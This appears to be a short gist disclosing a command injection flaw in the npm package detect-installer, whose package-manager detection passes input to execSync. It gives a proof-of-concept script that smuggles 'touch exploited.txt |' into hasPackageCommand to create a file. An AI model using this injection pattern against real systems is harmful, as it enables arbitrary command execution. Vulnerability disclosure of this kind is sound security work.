Last active
October 29, 2023 12:23
Package detect-installer: the detect-installer module is meant to detect an appropriate package manager to use, but it allows command injection into child_process' execSync.
'use strict'
const pkg = require('detect-installer');
// This creates a local 'exploited.txt' file.
pkg.hasPackageCommand('touch exploited.txt | ');